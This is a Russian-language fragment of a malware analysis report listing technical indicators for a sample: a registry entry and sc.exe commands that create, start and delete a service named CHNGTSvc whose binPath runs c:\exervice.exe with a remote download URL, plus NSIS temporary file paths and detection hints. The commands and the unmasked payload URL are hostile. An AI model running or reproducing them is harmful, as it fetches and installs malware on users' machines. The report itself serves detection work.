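Техническая информация
Ниже перечислены изменение реестра, запускаемые команды и пути к файлам, связанные с образцом; заголовки разделов исходного отчёта в этом фрагменте не сохранились. Образец регистрирует службу CHNGTSvc, в параметре ImagePath которой указан c:\exervice.exe с URL загрузки в качестве аргумента, а также запускает и удаляет эту службу через sc.exe. Судя по именам nst2.tmp и nsExec.dll, команды, вероятно, выполняются из NSIS-установщика, а нумерация временных файлов (ns3 — delete, ns4 — create, ns5 — start) предположительно отражает реальный порядок их выполнения. Пути, повторяющиеся в конце списка, по-видимому, относятся к разным разделам отчёта (созданные и удалённые файлы). Для обнаружения показательны создание службы, у которой binPath содержит URL, и появление исполняемого файла в корне диска C:.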
- [<HKLM>\SYSTEM\ControlSet001\Services\CHNGTSvc] 'ImagePath' = 'c:\exervice.exe http://cloudfront.1e072b3360ec828ac7efbd22c247e34f2751568d.xyz/download/xpack1011_RU.1476196077.exe'
- '<SYSTEM32>\sc.exe' create CHNGTSvc binPath= "c:\exervice.exe http://cl########.####2b3360ec828ac7efbd22c247e34f2751568d.xyz/download/xpack1011_RU.1476196077.exe"
- '%TEMP%\nst2.tmp\ns5.tmp' sc start CHNGTSvc
- '<SYSTEM32>\sc.exe' start CHNGTSvc
- '%TEMP%\nst2.tmp\ns3.tmp' sc delete CHNGTSvc
- '<SYSTEM32>\sc.exe' delete CHNGTSvc
- '%TEMP%\nst2.tmp\ns4.tmp' sc create CHNGTSvc binPath= "c:\exervice.exe http://cl########.####2b3360ec828ac7efbd22c247e34f2751568d.xyz/download/xpack1011_RU.1476196077.exe"
- %TEMP%\nst2.tmp\ns4.tmp
- %TEMP%\nst2.tmp\ns5.tmp
- %TEMP%\nst2.tmp\ns3.tmp
- C:\exervice.exe
- %TEMP%\nst2.tmp\nsExec.dll
- %TEMP%\nst2.tmp\ns4.tmp
- %TEMP%\nst2.tmp\ns3.tmp